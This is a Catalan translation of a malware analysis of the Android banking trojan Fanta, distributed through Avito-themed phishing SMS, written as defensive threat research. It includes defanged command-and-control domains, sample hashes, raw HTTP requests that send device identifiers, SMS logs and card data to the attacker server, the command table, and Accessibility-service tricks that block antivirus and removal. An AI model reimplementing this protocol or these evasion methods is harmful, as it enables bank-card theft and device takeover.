Un dia voleu vendre alguna cosa a Avito i, després d'haver publicat una descripció detallada del vostre producte (per exemple, un mòdul RAM), rebreu aquest missatge:
Un cop obriu l'enllaç, veureu una pàgina aparentment innòcua que us avisa, el venedor feliç i reeixit, que s'ha fet una compra:
Un cop feu clic al botó "Continua", es baixarà un fitxer APK amb una icona i un nom que inspiri confiança al vostre dispositiu Android. Vas instal·lar una aplicació que per algun motiu demanava drets d'AccessibilityService, després van aparèixer un parell de finestres i van desaparèixer ràpidament i... Ja està.
Ves a comprovar el teu saldo, però per algun motiu la teva aplicació bancària torna a demanar les dades de la teva targeta. Després d'introduir les dades, passa alguna cosa terrible: per alguna raó encara no està clara, els diners comencen a desaparèixer del vostre compte. Estàs intentant resoldre el problema, però el teu telèfon es resisteix: prem les tecles "Enrere" i "Inici", no s'apaga i no et permet activar cap mesura de seguretat. Com a resultat, et quedes sense diners, els teus béns no s'han comprat, estàs confós i et preguntes: què va passar?
La resposta és senzilla: us heu convertit en una víctima del troià Android Fanta, membre de la família Flexnet. Com va passar això? Expliquem-ho ara.
Autors: Andrei Polovinkin, especialista júnior en anàlisi de programari maliciós, Ivan Pisarev, especialista en anàlisi de malware.
Algunes estadístiques
La família de troians d'Android Flexnet es va conèixer per primera vegada el 2015. Durant un període d'activitat força llarg, la família es va expandir a diverses subespècies: Fanta, Limebot, Lipton, etc. El troià, així com la infraestructura associada a ell, no s'aturen: s'estan desenvolupant nous esquemes de distribució efectius; en el nostre cas, pàgines de pesca d'alta qualitat adreçades a un usuari-venedor específic, i els desenvolupadors troians segueixen les tendències de moda en escriptura de virus: afegeix una nova funcionalitat que permet robar diners de manera més eficient dels dispositius infectats i evitar els mecanismes de protecció.
La campanya que es descriu en aquest article està dirigida a usuaris de Rússia; un petit nombre de dispositius infectats es va registrar a Ucraïna i encara menys a Kazakhstan i Bielorússia.
Tot i que Flexnet porta més de 4 anys a l'arena dels troians d'Android i ha estat estudiat en detall per molts investigadors, encara està en bon estat. A partir del gener de 2019, la quantitat potencial de danys és de més de 35 milions de rubles, i això només és per a campanyes a Rússia. L'any 2015, es van vendre diverses versions d'aquest troià d'Android en fòrums subterranis, on també es podia trobar el codi font del troià amb una descripció detallada. Això vol dir que les estadístiques de danys al món són encara més impressionants. No és un mal indicador per a un home tan gran, oi?
De la venda a l'engany
Com es pot veure a la captura de pantalla presentada anteriorment d'una pàgina de pesca per al servei d'Internet per publicar anuncis Avito, es va preparar per a una víctima concreta. Pel que sembla, els atacants utilitzen un dels analitzadors d'Avito, que extreu el número de telèfon i el nom del venedor, així com la descripció del producte. Després d'ampliar la pàgina i preparar el fitxer APK, a la víctima se li envia un SMS amb el seu nom i un enllaç a una pàgina de pesca que conté una descripció del seu producte i l'import rebut de la "venda" del producte. En fer clic al botó, l'usuari rep un fitxer APK maliciós: Fanta.
Un estudi del domini shcet491[.]ru va demostrar que està delegat als servidors DNS d'Hostinger:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
El fitxer de la zona del domini conté entrades que apunten a les adreces IP 31.220.23[.]236, 31.220.23[.]243 i 31.220.23[.]235. Tanmateix, el registre de recursos primaris del domini (registre A) apunta a un servidor amb l'adreça IP 178.132.1[.]240.
L'adreça IP 178.132.1[.]240 es troba als Països Baixos i pertany a l'hoster WorldStream. Les adreces IP 31.220.23[.]235, 31.220.23[.]236 i 31.220.23[.]243 es troben al Regne Unit i pertanyen al servidor d'allotjament compartit HOSTINGER. S'utilitza com a gravadora openprov-ru. Els dominis següents també s'han resolt amb l'adreça IP 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Cal tenir en compte que els enllaços en el format següent estaven disponibles des de gairebé tots els dominis:
http://(www.){0,1}<%domain%>/[0-9]{7}
Aquesta plantilla també inclou un enllaç d'un missatge SMS. A partir de dades històriques, es va trobar que un domini correspon a diversos enllaços en el patró descrit anteriorment, la qual cosa indica que es va utilitzar un domini per distribuir el troià a diverses víctimes.
Anem una mica endavant: el troià descarregat mitjançant un enllaç d'un SMS utilitza l'adreça com a servidor de control onusedseddohap[.]club. Aquest domini es va registrar el 2019-03-12 i a partir del 2019-04-29, les aplicacions APK van interactuar amb aquest domini. A partir de les dades obtingudes de VirusTotal, un total de 109 aplicacions van interactuar amb aquest servidor. El propi domini s'ha resolt a l'adreça IP 217.23.14[.]27, situat als Països Baixos i propietat de l'hoster WorldStream. S'utilitza com a gravadora Namecheap. Els dominis també s'han resolt a aquesta adreça IP bad-racoon[.]club (a partir del 2018-09-25) i bad-racoon[.]live (a partir del 2018-10-25). Amb domini bad-racoon[.]club amb més de 80 fitxers APK interactuats bad-racoon[.]live - Més de 100.
En general, l'atac avança de la següent manera:
Què hi ha sota la tapa de la Fanta?
Com molts altres troians d'Android, Fanta és capaç de llegir i enviar missatges SMS, fer sol·licituds USSD i mostrar les seves pròpies finestres a sobre de les aplicacions (incloses les bancàries). No obstant això, l'arsenal de funcionalitats d'aquesta família ha arribat: Fanta va començar a utilitzar Servei d'accessibilitat amb diferents finalitats: llegir el contingut de les notificacions d'altres aplicacions, impedir la detecció i aturar l'execució d'un troià en un dispositiu infectat, etc. Fanta funciona amb totes les versions d'Android no anteriors a la 4.4. En aquest article analitzarem més de prop la següent mostra de Fanta:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immediatament després del llançament
Immediatament després del llançament, el troià amaga la seva icona. L'aplicació només pot funcionar si el nom del dispositiu infectat no està a la llista:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (maquineta d'afaitar)
Aquesta comprovació es realitza al servei principal del troià - Servei principal. Quan s'inicia per primera vegada, els paràmetres de configuració de l'aplicació s'inicialitzen als valors predeterminats (més endavant es parlarà del format per emmagatzemar les dades de configuració i el seu significat) i es registra un nou dispositiu infectat al servidor de control. S'enviarà una sol·licitud HTTP POST amb el tipus de missatge al servidor register_bot i informació sobre el dispositiu infectat (versió d'Android, IMEI, número de telèfon, nom de l'operador i codi del país en què està registrat l'operador). L'adreça serveix com a servidor de control hXXp://onuseseddohap[.]club/controller.php. En resposta, el servidor envia un missatge que conté els camps bot_id, bot_pwd, servidor — l'aplicació guarda aquests valors com a paràmetres del servidor CnC. Paràmetre servidor opcional si no s'ha rebut el camp: Fanta utilitza l'adreça de registre - hXXp://onuseseddohap[.]club/controller.php. La funció de canviar l'adreça CnC es pot utilitzar per resoldre dos problemes: per distribuir la càrrega de manera uniforme entre diversos servidors (si hi ha un gran nombre de dispositius infectats, la càrrega en un servidor web no optimitzat pot ser alta), i també per utilitzar un servidor alternatiu en cas de fallada d'un dels servidors CnC.
Si es produeix un error en enviar la sol·licitud, el troià repetirà el procés de registre al cap de 20 segons.
Un cop el dispositiu s'hagi registrat correctament, Fanta mostrarà el següent missatge a l'usuari:
Nota important: el servei ha trucat Seguretat del sistema — el nom del servei troià, i després de fer clic al botó bo S'obrirà una finestra amb la configuració d'accessibilitat del dispositiu infectat, on l'usuari ha de concedir drets d'accessibilitat per al servei maliciós:
Tan bon punt l'usuari s'encén Servei d'accessibilitat, Fanta accedeix al contingut de les finestres de l'aplicació i a les accions que s'hi duen a terme:
Immediatament després de rebre els drets d'accessibilitat, el troià demana drets d'administrador i drets per llegir les notificacions:
Mitjançant el Servei d'Accessibilitat, l'aplicació simula les pulsacions de tecles, donant-se així tots els drets necessaris.
Fanta crea múltiples instàncies de base de dades (que es descriurà més endavant) necessàries per emmagatzemar dades de configuració, així com la informació recollida en el procés sobre el dispositiu infectat. Per enviar la informació recollida, el troià crea una tasca repetida dissenyada per descarregar camps de la base de dades i rebre una ordre del servidor de control. L'interval per accedir a CnC s'estableix en funció de la versió d'Android: en el cas de la 5.1, l'interval serà de 10 segons, en cas contrari, de 60 segons.
Per rebre l'ordre, Fanta fa una petició GetTask al servidor de gestió. En resposta, CnC pot enviar una de les ordres següents:
| Equip | Descripció |
|---|---|
| 0 | Enviar missatge SMS |
| 1 | Feu una trucada telefònica o una ordre USSD |
| 2 | Actualitza un paràmetre interval |
| 3 | Actualitza un paràmetre interceptar |
| 6 | Actualitza un paràmetre smsManager |
| 9 | Comenceu a recollir missatges SMS |
| 11 | Restableix el telèfon a la configuració de fàbrica |
| 12 | Activa/desactiva el registre de la creació del quadre de diàleg |
Fanta també recull notificacions de 70 aplicacions bancàries, sistemes de pagament ràpid i carteres electròniques i les emmagatzema en una base de dades.
Emmagatzematge dels paràmetres de configuració
Per emmagatzemar els paràmetres de configuració, Fanta utilitza un enfocament estàndard per a la plataforma Android: Preferències-Fitxers. La configuració es desarà en un fitxer anomenat ajustos. Una descripció dels paràmetres desats es troba a la taula següent.
| nom | Valor per defecte | Valors possibles | Descripció |
|---|---|---|---|
| id | 0 | Sencer | ID del bot |
| servidor | hXXp://onuseseddohap[.]club/ | URL | Control de l'adreça del servidor |
| pwd | - | Cadena | Contrasenya del servidor |
| interval | 20 | Sencer | Interval de temps. Indica quant de temps s'han d'ajornar les tasques següents:
|
| interceptar | tots | tot/número de telèfon | Si el camp és igual a la cadena tots o telNumber, llavors el missatge SMS rebut serà interceptat per l'aplicació i no es mostrarà a l'usuari |
| smsManager | 0 | 0/1 | Activa/desactiva l'aplicació com a destinatari d'SMS predeterminat |
| readDialog | false | Vertader/fals | Activa/desactiva el registre d'esdeveniments Esdeveniment d'accessibilitat |
Fanta també utilitza el fitxer smsManager:
| nom | Valor per defecte | Valors possibles | Descripció |
|---|---|---|---|
| pckg | - | Cadena | Nom del gestor de missatges SMS utilitzat |
Interacció amb bases de dades
Durant el seu funcionament, el troià utilitza dues bases de dades. Base de dades anomenada a s'utilitza per emmagatzemar informació diversa recollida del telèfon. La segona base de dades s'anomena fantasia.db i s'utilitza per desar la configuració responsable de la creació de finestres de pesca dissenyades per recollir informació sobre targetes bancàries.
Troià utilitza una base de dades а per emmagatzemar la informació recopilada i registrar les vostres accions. Les dades s'emmagatzemen en una taula logs. Per crear una taula, utilitzeu la següent consulta SQL:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)La base de dades conté la informació següent:
1. Registrar l'inici del dispositiu infectat amb un missatge El telèfon s'ha encès!
2. Notificacions de les aplicacions. El missatge es genera segons la plantilla següent:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Dades de la targeta bancària de formularis de pesca creats pel troià. Paràmetre VIEW_NAME pot ser una de les següents:
- AliExpress
- Avito
- Google Joc
- Diversos <%Nom de l'aplicació%>
El missatge es registra amb el format:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Missatges SMS entrants/sortints en el format:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informació sobre el paquet que crea el quadre de diàleg en el format:
(<%Package name%>)<%Package information%>
Taula d'exemple logs:
Una de les funcionalitats de Fanta és la recollida d'informació sobre targetes bancàries. La recollida de dades es produeix mitjançant la creació de finestres de pesca quan s'obren aplicacions bancàries. El troià només crea la finestra de pesca una vegada. La informació que s'ha mostrat la finestra a l'usuari s'emmagatzema en una taula ajustos a la base de dades fantasia.db. Per crear una base de dades, utilitzeu la següent consulta SQL:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Tots els camps de la taula ajustos per defecte inicialitzat a 1 (creeu una finestra de pesca). Després que l'usuari introdueixi les seves dades, el valor s'establirà en 0. Exemple de camps de taula ajustos:
- pot_iniciar sessió — el camp s'encarrega de mostrar el formulari en obrir una aplicació bancària
- primer_banc - no utilitzat
- can_avito — el camp s'encarrega de mostrar el formulari en obrir l'aplicació Avito
- can_ali — el camp s'encarrega de mostrar el formulari en obrir l'aplicació Aliexpress
- pot_un altre — el camp s'encarrega de mostrar el formulari en obrir qualsevol sol·licitud de la llista: Yula, Pandao, Drom Auto, Wallet. Targetes de descompte i bonificació, Aviasales, Booking, Trivago
- pot_targeta — el camp s'encarrega de mostrar el formulari en obrir Google Joc
Interacció amb el servidor de gestió
La interacció de la xarxa amb el servidor de gestió es produeix mitjançant el protocol HTTP. Per treballar amb la xarxa, Fanta utilitza la popular biblioteca Retrofit. Les sol·licituds s'envien a: hXXp://onuseseddohap[.]club/controller.php. L'adreça del servidor es pot canviar en registrar-se al servidor. Es poden enviar galetes com a resposta des del servidor. Fanta fa les següents peticions al servidor:
- El registre del bot al servidor de control es produeix una vegada, al primer llançament. Les dades següents sobre el dispositiu infectat s'envien al servidor:
· Galeta — galetes rebudes del servidor (el valor per defecte és una cadena buida)
· manera - constant de corda register_bot
· prefix - constant entera 2
· version_sdk — està format segons la plantilla següent: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — IMEI del dispositiu infectat
· país — codi del país on està registrat l'operador, en format ISO
· nombre - número de telèfon
· operador - Nom de l'operadorUn exemple d'una sol·licitud enviada al servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>En resposta a la sol·licitud, el servidor ha de retornar un objecte JSON que contingui els paràmetres següents:
· bot_id — ID del dispositiu infectat. Si bot_id és igual a 0, Fanta tornarà a executar la sol·licitud.
bot_pwd — contrasenya per al servidor.
servidor — Controlar l'adreça del servidor. Paràmetre opcional. Si no s'especifica el paràmetre, s'utilitzarà l'adreça desada a l'aplicació.Exemple d'objecte JSON:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Sol·licitud per rebre una ordre del servidor. S'envien les dades següents al servidor:
· Galeta — galetes rebudes del servidor
· oferta — ID del dispositiu infectat que es va rebre en enviar la sol·licitud register_bot
· pwd —contrasenya per al servidor
· divice_admin — el camp determina si s'han obtingut els drets d'administrador. Si s'han obtingut drets d'administrador, el camp és igual a 1d'una altra manera 0
· Accessibilitat — Estat de funcionament del servei d'accessibilitat. Si el servei es va iniciar, el valor és 1d'una altra manera 0
· SMSManager — mostra si el troià està habilitat com a aplicació predeterminada per rebre SMS
· pantalla — mostra en quin estat es troba la pantalla. S'establirà el valor 1, si la pantalla està encesa, en cas contrari 0;Un exemple d'una sol·licitud enviada al servidor:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Depenent de l'ordre, el servidor pot retornar un objecte JSON amb diferents paràmetres:
· Equip Enviar missatge SMS: Els paràmetres contenen el número de telèfon, el text del missatge SMS i l'ID del missatge que s'envia. L'identificador s'utilitza quan s'envia un missatge al servidor amb tipus setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Equip Feu una trucada telefònica o una ordre USSD: el número de telèfon o l'ordre ve al cos de la resposta.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Equip Canvia el paràmetre d'interval.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Equip Canvia el paràmetre d'intercepció.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Equip Canvia el camp de l'SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Equip Recolliu missatges SMS d'un dispositiu infectat.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Equip Restableix el telèfon a la configuració de fàbrica:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Equip Canvia el paràmetre ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Enviament d'un missatge amb tipus setSmsStatus. Aquesta sol·licitud es fa després d'executar l'ordre Enviar missatge SMS. La petició té aquest aspecte:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Càrrega del contingut de la base de dades. Es transmet una fila per sol·licitud. Les dades següents s'envien al servidor:
· Galeta — galetes rebudes del servidor
· manera - constant de corda setSaveInboxSms
· oferta — ID del dispositiu infectat que es va rebre en enviar la sol·licitud register_bot
· text — text al registre actual de la base de dades (camp d de la taula logs a la base de dades а)
· nombre — nom del registre actual de la base de dades (camp p de la taula logs a la base de dades а)
· mode_sms — valor enter (camp m de la taula logs a la base de dades а)La petició té aquest aspecte:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Si s'envia correctament al servidor, la fila s'eliminarà de la taula. Exemple d'un objecte JSON retornat pel servidor:
{ "response":[], "status":"ok" }
Interacció amb AccessibilityService
AccessibilityService es va implementar per fer que els dispositius Android siguin més fàcils d'utilitzar per a persones amb discapacitat. En la majoria dels casos, es requereix una interacció física per interactuar amb una aplicació. AccessibilityService us permet fer-los amb programació. Fanta utilitza el servei per crear finestres falses en aplicacions bancàries i evitar que els usuaris obrin la configuració del sistema i algunes aplicacions.
Mitjançant la funcionalitat del Servei d'Accessibilitat, el troià supervisa els canvis en els elements de la pantalla del dispositiu infectat. Com s'ha descrit anteriorment, la configuració de Fanta conté un paràmetre responsable de les operacions de registre amb quadres de diàleg: readDialog. Si s'estableix aquest paràmetre, s'afegirà a la base de dades informació sobre el nom i la descripció del paquet que va desencadenar l'esdeveniment. El troià realitza les accions següents quan es desencadenen esdeveniments:
- Simula la pressió de les tecles enrere i d'inici en els casos següents:
· si l'usuari vol reiniciar el seu dispositiu
· si l'usuari vol eliminar l'aplicació “Avito” o canviar els drets d'accés
· si hi ha una menció de l'aplicació "Avito" a la pàgina
· en obrir l'aplicació Google Play Protect
· en obrir pàgines amb la configuració del servei d'accessibilitat
· quan aparegui el quadre de diàleg Seguretat del sistema
· en obrir la pàgina amb la configuració "Dibuixa sobre una altra aplicació".
· en obrir la pàgina "Aplicacions", "Recuperació i restabliment", "Restabliment de dades", "Restabliment de la configuració", "Tauler de desenvolupadors", "Especial. oportunitats”, “Oportunitats especials”, “Drets especials”
· si l'esdeveniment ha estat generat per determinades aplicacions.Llistat d'aplicacions
- android
- Mestre Lite
- Clean Master
- Clean Master per a CPU x86
- Gestió de permisos de l'aplicació Meizu
- Seguretat MIUI
- Clean Master - Antivirus, memòria cau i netejador d'escombraries
- Controls parentals i GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock i Web Security Beta
- Netejador de virus, antivirus, netejador (MAX Security)
- Mobile AntiVirus Security PRO
- Antivirus Avast i protecció gratuïta 2019
- Seguretat mòbil MegaFon
- Protecció AVG per a Xperia
- Seguretat mòbil
- Antivirus i protecció de Malwarebytes
- Antivirus per a Android 2019
- Mestre de seguretat - Antivirus, VPN, AppLock, Booster
- Antivirus AVG per al gestor del sistema de tauletes Huawei
- Samsung Accessibilitat
- Samsung Smart Manager
- Mestre de seguretat
- Booster de velocitat
- Dr. Web
- Espai de seguretat Dr.Web
- Centre de control mòbil Dr.Web
- Dr.Web Security Space Life
- Centre de control mòbil Dr.Web
- Antivirus i seguretat mòbil
- Kaspersky Internet Security: antivirus i protecció
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security: protecció i gestió
- AVG Antivirus free 2019: protecció per a Android
- antivirus Android
- Norton Mobile Security i antivirus
- Antivirus, tallafoc, VPN, seguretat mòbil
- Seguretat mòbil: antivirus, VPN, protecció contra robatoris
- Antivirus per a Android
- Si es demana permís quan s'envia un missatge SMS a un número curt, Fanta simula fer clic a la casella de selecció Recordeu l'elecció i botó enviar.
- Quan intenteu treure els drets d'administrador al troià, bloqueja la pantalla del telèfon.
- Impedeix afegir nous administradors.
- Si l'aplicació antivirus dr.web detectat una amenaça, Fanta imita prémer el botó ignorar.
- El troià simula prémer el botó d'enrere i d'inici si l'aplicació ha generat l'esdeveniment Cura de dispositius Samsung.
- Fanta crea finestres de pesca amb formularis per introduir informació sobre targetes bancàries si es va llançar una aplicació d'una llista d'uns 30 serveis d'Internet diferents. Entre ells: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Formularis de pesca
Fanta analitza quines aplicacions s'estan executant al dispositiu infectat. Si s'ha obert una aplicació d'interès, el troià mostra una finestra de pesca a sobre de totes les altres, que és un formulari per introduir la informació de la targeta bancària. L'usuari ha d'introduir les dades següents:
- Número de targeta
- Data de caducitat de la targeta
- CVV
- Nom del titular de la targeta (no per a tots els bancs)
Depenent de l'aplicació en execució, es mostraran diferents finestres de pesca. A continuació es mostren exemples d'alguns d'ells:
Aliexpress:
Avito:
Per a algunes altres aplicacions, p. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Com va ser realment
Afortunadament, la persona que va rebre el missatge SMS descrit al principi de l'article va resultar ser un especialista en ciberseguretat. Per tant, la versió real, que no és del director, difereix de la que es va explicar anteriorment: una persona va rebre un SMS interessant, després del qual el va lliurar a l'equip d'intel·ligència de caça d'amenaces del Grup-IB. El resultat de l'atac és aquest article. Final feliç, oi? No obstant això, no totes les històries acaben amb tant èxit, i perquè la teva no sembli un tall de director amb una pèrdua de diners, en la majoria dels casos n'hi ha prou amb complir les següents regles llargament descrites:
- no instal·leu aplicacions per a un dispositiu mòbil amb sistema operatiu Android des de cap font que no sigui Google Play
- Quan instal·leu una aplicació, presteu especial atenció als drets que demana l'aplicació
- presta atenció a les extensions dels fitxers descarregats
- instal·leu les actualitzacions del sistema operatiu Android amb regularitat
- no visiteu recursos sospitosos i no descarregueu fitxers d'allà
- No feu clic als enllaços rebuts als missatges SMS.
Font: www.habr.com